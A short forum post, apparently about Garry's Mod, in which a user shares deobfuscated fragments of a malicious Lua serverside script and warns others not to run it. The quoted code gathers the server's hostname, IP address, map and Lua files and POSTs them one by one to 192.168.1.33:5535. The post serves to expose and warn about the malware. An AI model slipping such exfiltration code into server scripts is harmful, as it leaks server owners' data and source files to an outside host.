Quote Originally Posted by NWILL-Helix View Post
I know this is an old thread but the answers in here were a little disappointing. I deobfuscated the code and it looks to be a serverside script that sends the hostname, IP address, current map, and your Lua files to 192.168.1.33:5535. This is a local IP address so you should check your network for malware...
Code:
local crepeat = "192.168.1.33"
local andc = "https://" .. crepeat .. ":5535"
Code:
local drepeat = util.TableToJSON({
	hostname = GetHostName(),
	ip = game.GetIPAddress(),
	map = game.GetMap()
})
Code:
HTTP({
	url = andc,
	method = "POST",
	body = endb,
	headers = {
		["Content-Type"] = "text/plain",
		filePath = don,
		files_cur = tostring(jrepeat),
		files_max = tostring(ink)
	},
	type = "text/plain",
	success = function()
		jrepeat = jrepeat+1
		if jrepeat <= ink then
			areturn.sendFile(continuem[jrepeat])
		end
	end,
	failed = print
})
I've attached the full deobfuscated script to this post. Don't run it.
Thanks for sharing